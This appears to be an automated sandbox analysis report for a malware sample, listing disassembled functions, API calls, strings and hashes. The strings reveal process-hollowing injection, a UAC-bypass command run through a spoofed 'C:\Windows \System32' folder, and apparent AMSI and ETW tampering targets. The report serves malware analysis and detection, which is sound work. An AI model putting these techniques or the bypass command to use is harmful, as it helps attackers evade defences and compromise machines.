Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

IsProcessorFeaturePresent, xrefs: 0041361F
KERNEL32, xrefs: 00413610

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMON

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Akaelkov.PIFPID: 2504, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	6.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	400
Total number of Limit Nodes:	24

Executed Functions

Function 040CCA40 Relevance: 214.7, APIs: 9, Strings: 109, Instructions: 8183COMMON

Download Yara Rule

Strings

NtQueryVirtualMemory, xrefs: 040D6FC6
LdrLoadDll, xrefs: 040D715E
CreateProcessAsUserW, xrefs: 040D6A38, 040D6A65
EtwEventWrite, xrefs: 040D725D
kernel32, xrefs: 040D6C05, 040D6C38, 040D6C6B, 040D6C9E, 040D6CD1, 040D6D04, 040D6D37
CreateProcessAsUserA, xrefs: 040D6A29
NtCreateSection, xrefs: 040D705F
SetUnhandledExceptionFilter, xrefs: 040D6D20
URL=file:", xrefs: 040D14D0
EnumServicesStatusW, xrefs: 040D69CF
UacUninitialize, xrefs: 040D21BA
@^@, xrefs: 040CF0F0
DllRegisterServer, xrefs: 040CD169
mssip32, xrefs: 040CCE74, 040CCEA7, 040CCEDA
ScanBuffer, xrefs: 040CCB72, 040CCDE7, 040CD011, 040CD556, 040CD663, 040CD76A, 040CDB2D, 040CDCE2, 040CDE88, 040CDF2C, 040CE13D, 040CE1B9, 040CE880, 040CEACA, 040CECD8, 040CEDE2, 040CEF06, 040CF334, 040CF4D1, 040CF87C, 040CFBCB, 040CFE8F, 040D0003, 040D01C3, 040D0371, 040D063F, 040D07AC, 040D08D7, 040D0DCB, 040D1088, 040D114A, 040D12BE, 040D133A, 040D1BE1, 040D1E9F, 040D213E, 040D4008, 040D4297, 040D46E8, 040D47FF, 040D499C, 040D4A37, 040D4B2F, 040D51A5, 040D54E1, 040D566C, 040D591F, 040D5C78, 040D5F51, 040D606E, 040D6130, 040D6559, 040D74F3
NtSetSecurityObject, xrefs: 040D59A3
NtDeviceIoControlFile, xrefs: 040D6993
ws2_32, xrefs: 040D6A5B
OpenSession, xrefs: 040CCAAA, 040CD3B9, 040CD4DA, 040CD5E7, 040CD6EE, 040CDAB1, 040CDC66, 040CDE0C, 040CDFA8, 040CE0C1, 040CE235, 040CE8FC, 040CE9AA, 040CEC5C, 040CEE8A, 040CEF82, 040CF19D, 040CF54D, 040CF5D0, 040CF6E8, 040CF800, 040CF90C, 040CFB4F, 040CFDEE, 040CFF87, 040D0127, 040D03ED, 040D051D, 040D0828, 040D0953, 040D0AAB, 040D0BDB, 040D0C57, 040D100C, 040D1242, 040D13B6, 040D154A, 040D16FA, 040D1B65, 040D1D7B, 040D1E23, 040D1FC8, 040D22D5, 040D4100, 040D439B, 040D44A8, 040D4645, 040D487B, 040D4920, 040D4BAB, 040D4D4F, 040D504C, 040D5253, 040D5364, 040D5465, 040D576F, 040D58A3, 040D5ADA, 040D5DCB, 040D5E59, 040D61AC, 040D63B2, 040D6461, 040D66A1, 040D6898, 040D6AFC, 040D6DD5, 040D73FB, 040D756F
DlpGetWebSiteAccess, xrefs: 040D6668
LdrGetProcedureAddress, xrefs: 040D7191
iexpress.exe, xrefs: 040CD6D8
DlpCheckIsCloudSyncApp, xrefs: 040D6602
NtAlertResumeThread, xrefs: 040D6793
NtMapViewOfSection, xrefs: 040D7092
bcrypt, xrefs: 040CCF89, 040CCFBC, 040CCFEF, 040D5860, 040D5874, 040D5888, 040D643F
EnumServicesStatusExW, xrefs: 040D69ED
DEEX, xrefs: 040CCA83
NtOpenFile, xrefs: 040D71F7
RtlAllocateHeap, xrefs: 040D67C6, 040D682C
C:\\Windows \\System32\\easinvoker.exe, xrefs: 040D426E
ntdll, xrefs: 040D59A8, 040D59BC, 040D67AA, 040D67DD, 040D6810, 040D6843, 040D6876, 040D6FAA, 040D6FDD, 040D7010, 040D7043, 040D7076, 040D70A9, 040D70DC, 040D710F, 040D7142, 040D7175, 040D71A8, 040D71DB, 040D720E, 040D7241, 040D7274, 040D75E9
C:\Windows\System32\, xrefs: 040CD4B1, 040D45A2, 040D50DE
C:\Users\Public\, xrefs: 040D09D8, 040D176A
Kernel32, xrefs: 040D6A10, 040D6A1F, 040D6A6A
WriteVirtualMemory, xrefs: 040D6CBA
OpenProcess, xrefs: 040D6C87
SLGetEncryptedPIDEx, xrefs: 040D6F60
.url, xrefs: 040D09E3
EnumServicesStatusExA, xrefs: 040D69DE
C:\Users\Public\Libraries, xrefs: 040CDA1F
ScanString, xrefs: 040CCC9E, 040CCD77, 040CCEFC, 040CD08D, 040CD316, 040CD435, 040CD9AA, 040CEA26, 040CEBC2, 040CF07A, 040CF121, 040CF219, 040CF43E, 040CF764, 040CF988, 040CFA2D, 040CFD72, 040D00AB, 040D02BB, 040D0599, 040D0B27, 040D0CD3, 040D0F90, 040D1451, 040D15C6, 040D167E, 040D1CFF, 040D1F4C, 040D41F8, 040D431F, 040D442C, 040D4EC3, 040D52CF, 040D53E0, 040D57EB, 040D5D4F, 040D6228, 040D6336, 040D671D, 040D6914, 040D6B78, 040D6E51, 040D737F
BCryptRegisterProvider, xrefs: 040CCFD8, 040D5883
cmd /c "C:\\Windows \\System32\\easinvoker.exe", xrefs: 040D4309
sppwmi, xrefs: 040D6F11
I_QueryTagInformation, xrefs: 040D598F
NtQuerySystemInformation, xrefs: 040D6984
[InternetShortcut], xrefs: 040D14C1
CreateProcessA, xrefs: 040D6A0B
psapi, xrefs: 040D6A01
NtAccessCheck, xrefs: 040D712B
NtQueryDirectoryFile, xrefs: 040D69A2
NtGetWriteWatch, xrefs: 040D6F93
RtlQueryProcessDebugInformation, xrefs: 040D69B1
NtWaitForSingleObject, xrefs: 040D67F9
VirtualProtect, xrefs: 040D6C54
CryptSIPGetInfo, xrefs: 040CCE5D
NtQuerySecurityObject, xrefs: 040D70F8
RtlCreateQueryDebugBuffer, xrefs: 040D685F
SxTracerGetThreadContextDebug, xrefs: 040D6EC7
CreateProcessWithLogonW, xrefs: 040D6A47
spp, xrefs: 040D6EDE
smartscreenps, xrefs: 040CD11A, 040CD14D, 040CD180
C:\Windows\SysWOW64, xrefs: 040D22AC
acS, xrefs: 040D2425
DllGetActivationFactory, xrefs: 040CD136
FlushInstructionCache, xrefs: 040D6CED
.png, xrefs: 040CDBA3, 040CE2AB, 040D729B, 040D72E1, 040D732B, 040D7352
CryptSIPVerifyIndirectData, xrefs: 040CCE90
VirtualAlloc, xrefs: 040D6BEE
VirtualAllocEx, xrefs: 040D6C21
^^Nc, xrefs: 040CDEFE, 040CEA9C
TrustOpenStores, xrefs: 040CCCF9
WinHttp.WinHttpRequest.5.1, xrefs: 040CF6C2
DllGetClassObject, xrefs: 040CD103, 040D0753, 040D6EFA
DlpNotifyPreDragDrop, xrefs: 040D65CF
UacInitialize, xrefs: 040CCBD6, 040CD21E, 040CD92E, 040D0A2F, 040D4084, 040D4FD0, 040D5BFC, 040D6A80
HotKey=, xrefs: 040D1658
wintrust, xrefs: 040CCD0A, 040CCD31, 040CCD58
endpointdlp, xrefs: 040D65E6, 040D6619, 040D664C, 040D667F
Ntdll, xrefs: 040D6989, 040D6998, 040D69A7, 040D69B6
BCryptVerifySignature, xrefs: 040CCF72, 040D585B, 040D6428
connect, xrefs: 040D6A56
NtWriteVirtualMemory, xrefs: 040D71C4
BCryptQueryProviderRegistration, xrefs: 040CCFA5, 040D586F
FindCertsByIssuer, xrefs: 040CCD47
EtwEventWriteEx, xrefs: 040D722A
http, xrefs: 040CF4AE
sppc, xrefs: 040D6F44, 040D6F77
EnumServicesStatusA, xrefs: 040D69C0
NtQueryInformationThread, xrefs: 040D6FF9
UacScan, xrefs: 040CCC3A, 040CD1A2, 040CD29A, 040CD836, 040CE804, 040CED66, 040CF64C, 040CFC67, 040D0E98, 040D11C6, 040D1C5D, 040D2044, 040D2236, 040D2351, 040D417C, 040D4524, 040D45C9, 040D4764, 040D4AB3, 040D4E47, 040D4F54, 040D5129, 040D5574, 040D56F3, 040D5A5E, 040D5B80, 040D5ED5, 040D5FF2, 040D62A4
CreateProcessW, xrefs: 040D6A1A
GET, xrefs: 040CF7DB
MZP, xrefs: 040D5FC7
C:\\Users\\Public\\Libraries\\, xrefs: 040D0E3B
Initialize, xrefs: 040CCB0E, 040CD8B2, 040CDA35, 040CDBEA, 040CDD90, 040CE045, 040CEB46, 040CEFFE, 040CF2B8, 040CF3C2, 040CFAA9, 040CFCE3, 040CFF0B, 040D023F, 040D06DD, 040D0D4F, 040D0F14, 040D4DCB, 040D55F0, 040D59E2, 040D64DD, 040D6D59, 040D7477
can, xrefs: 040D2438
EnumProcessModules, xrefs: 040D69FC
advapi32, xrefs: 040D5994
DlpGetArchiveFileTraceInfo, xrefs: 040D6635
IconIndex=, xrefs: 040D1524
NtReadVirtualMemory, xrefs: 040D70C5
NtOpenProcess, xrefs: 040D59B7, 040D75E4
NtOpenSection, xrefs: 040D702C
Advapi, xrefs: 040D69C5, 040D69D4, 040D69E3, 040D69F2, 040D6A2E, 040D6A3D, 040D6A4C
SLGatherMigrationBlob, xrefs: 040D6F2D
WintrustAddActionID, xrefs: 040CCD20
CryptSIPGetSignedDataMsg, xrefs: 040CCEC3

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Path$FileName$CloseName_$AddressAttributesCurrentFreeLibraryModuleProcProcessWrite
String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\System32\\easinvoker.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
API String ID: 976750054-2902499223
Opcode ID: ab06cb46ffd0881636d075fe75f28f48d717e41b4904d81b67c4362b9e6f9e51
Instruction ID: 5934cbad34d258c67726973178874b168fcf7050f05cccc7daec8ba71c9fb858
Opcode Fuzzy Hash: ab06cb46ffd0881636d075fe75f28f48d717e41b4904d81b67c4362b9e6f9e51
Instruction Fuzzy Hash: 71F3ED35B012199BE750EB68DD80BDEB3F9AF8530CF5081A6E109BB614DB34BE858F45

Uniqueness

Uniqueness Score: -1.00%

Function 04097E4C Relevance: 41.7, APIs: 7, Strings: 16, Instructions: 1478
nativethreadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0408FD38: GetProcAddress.KERNEL32(0410A358,00000000), ref: 0408FD97
Part of subcall function 0408FD38: GetCurrentProcess.KERNEL32(0410A35C,Function_00005ADC,00000004,0410A360,00000000,0410A35C,17D783FC,00000040,0410A360,0410A358,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0408FDE3
Part of subcall function 0408FD38: FreeLibrary.KERNEL32(0410A358,00000000,0410A35C,Function_00005ADC,00000004,0410A360,00000000,0410A35C,17D783FC,00000040,0410A360,0410A358,00000000,00000000,00000000,00000000), ref: 0408FDF4

GetThreadContext.KERNEL32(0410A3FC,0410A44C,ScanString,0410A3D0,04099710,UacInitialize,0410A3D0,04099710,ScanBuffer,0410A3D0,04099710,ScanBuffer,0410A3D0,04099710,OpenSession,0410A3D0), ref: 040985CE
NtReadVirtualMemory.NTDLL(0410A3F8,0410A4E8,0410A520,00000004,0410A528), ref: 0409882B
NtUnmapViewOfSection.NTDLL(0410A3F8,0409AF38), ref: 040989A6

Part of subcall function 0408FB80: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0408FB8D
Part of subcall function 0408FB80: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0408FB93
Part of subcall function 0408FB80: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0408FBB3

NtWriteVirtualMemory.NTDLL(0410A3F8,0410A524,00000000,0410A534,0410A528), ref: 04098F89
NtWriteVirtualMemory.NTDLL(0410A3F8,0410A4E8,0410A524,00000004,0410A528), ref: 040990FC
SetThreadContext.KERNEL32(0410A3FC,0410A44C,ScanBuffer,0410A3D0,04099710,ScanString,0410A3D0,04099710,Initialize,0410A3D0,04099710,0410A3F8,0410A4E8,0410A524,00000004,0410A528), ref: 04099272
NtResumeThread.NTDLL(0410A3FC,00000000), ref: 0409927F

Part of subcall function 0408FCD8: LoadLibraryW.KERNEL32 ref: 0408FCEA
Part of subcall function 0408FCD8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0408FCF7
Part of subcall function 0408FCD8: NtWriteVirtualMemory.NTDLL(0410A3F8,00000000,?,00000001,?), ref: 0408FD0E
Part of subcall function 0408FCD8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,04099710,ScanString,0410A3D0,04099710,Initialize,0410A3D0,04099710,UacScan,0410A3D0,04099710,UacInitialize,0410A3D0), ref: 0408FD1D

Strings

UacInitialize, xrefs: 040980B5, 040982E9, 040984DE, 040985E2, 040989DE, 04098B52, 0409928B
OpenSession, xrefs: 04098237, 0409835A, 040995D2
advapi32, xrefs: 040995A8
Initialize, xrefs: 04098167, 040986C4, 0409884B, 04098C34, 04098E25, 04098F95, 04099108, 0409936D
NtReadVirtualMemory, xrefs: 0409957B
NtSetSecurityObject, xrefs: 040995B7
UacScan, xrefs: 04097EF6, 0409810E, 04098653, 04098A4F, 04098BC3, 040992FC
NtOpenObjectAuditAlarm, xrefs: 0409958F
BCryptRegisterProvider, xrefs: 040994F6
bcrypt, xrefs: 040994D3, 040994E7, 040994FB
BCryptVerifySignature, xrefs: 040994CE
ScanBuffer, xrefs: 04097E85, 04097F4F, 04097FD7, 040983CB, 0409846D, 040987A6, 0409892D, 04098AC0, 04098D49, 04098F07, 04099077, 040991EA, 040993DE, 04099643
ntdll, xrefs: 04099580, 04099594, 040995BC
I_QueryTagInformation, xrefs: 040995A3
BCryptQueryProviderRegistration, xrefs: 040994E2
ScanString, xrefs: 04098030, 040981C6, 0409854F, 04098735, 040988BC, 04098CD8, 04098E96, 04099006, 04099179, 04099464, 04099511

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextFree$AllocateCurrentHandleLoadModuleProcessReadResumeSectionUnmapView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
API String ID: 98964713-1058128293
Opcode ID: 2cb86fd318f461169483d83dfe0e8ff24ebb50e3b742416b0938fdfc9cf65b3d
Instruction ID: f30675290080b816b3ef5052e9edcabb3325e6c559e27e4106f642a794744e8d
Opcode Fuzzy Hash: 2cb86fd318f461169483d83dfe0e8ff24ebb50e3b742416b0938fdfc9cf65b3d
Instruction Fuzzy Hash: 74D21871A001199BEB51EB64DD90FCEB7B9AF55208F1081A5E104BB324DF30FE869F5A

Uniqueness

Uniqueness Score: -1.00%

Function 04075DDC Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 04075DF8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04075E16
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04075E34
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 04075E52
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,04075EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 04075E9B
RegQueryValueExA.ADVAPI32(?,04076048,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,04075EE1,?,80000001), ref: 04075EB9
RegCloseKey.ADVAPI32(?,04075EE8,00000000,00000000,00000005,00000000,04075EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04075EDB
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 04075EF8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 04075F05
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 04075F0B
lstrlen.KERNEL32(00000000), ref: 04075F36
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 04075F7D
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04075F8D
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 04075FB5
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04075FC5
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04075FEB
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04075FFB

Strings

Software\Borland\Delphi\Locales, xrefs: 04075E48
Software\Borland\Locales, xrefs: 04075E0C, 04075E2A
., xrefs: 04075F48

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-3917250287
Opcode ID: 069c3e6c0c03358446caf4a23cad722280735d3025ff282beae69c54c2b59b9b
Instruction ID: 7ae3cda3732a7f6a961c8b41d506283398491cc6730758fc3bed830f3e6b9c72
Opcode Fuzzy Hash: 069c3e6c0c03358446caf4a23cad722280735d3025ff282beae69c54c2b59b9b
Instruction Fuzzy Hash: 86518675E0024C7EFB25DAA4CC46FEF77EC9B04748F4004A1A705FA1C1E674BA558BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0408FCD8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 0408FCEA
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0408FCF7
NtWriteVirtualMemory.NTDLL(0410A3F8,00000000,?,00000001,?), ref: 0408FD0E
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,04099710,ScanString,0410A3D0,04099710,Initialize,0410A3D0,04099710,UacScan,0410A3D0,04099710,UacInitialize,0410A3D0), ref: 0408FD1D

Strings

BCryptVerifySignature, xrefs: 0408FCF5
bcrypt, xrefs: 0408FCE9

Memory Dump Source

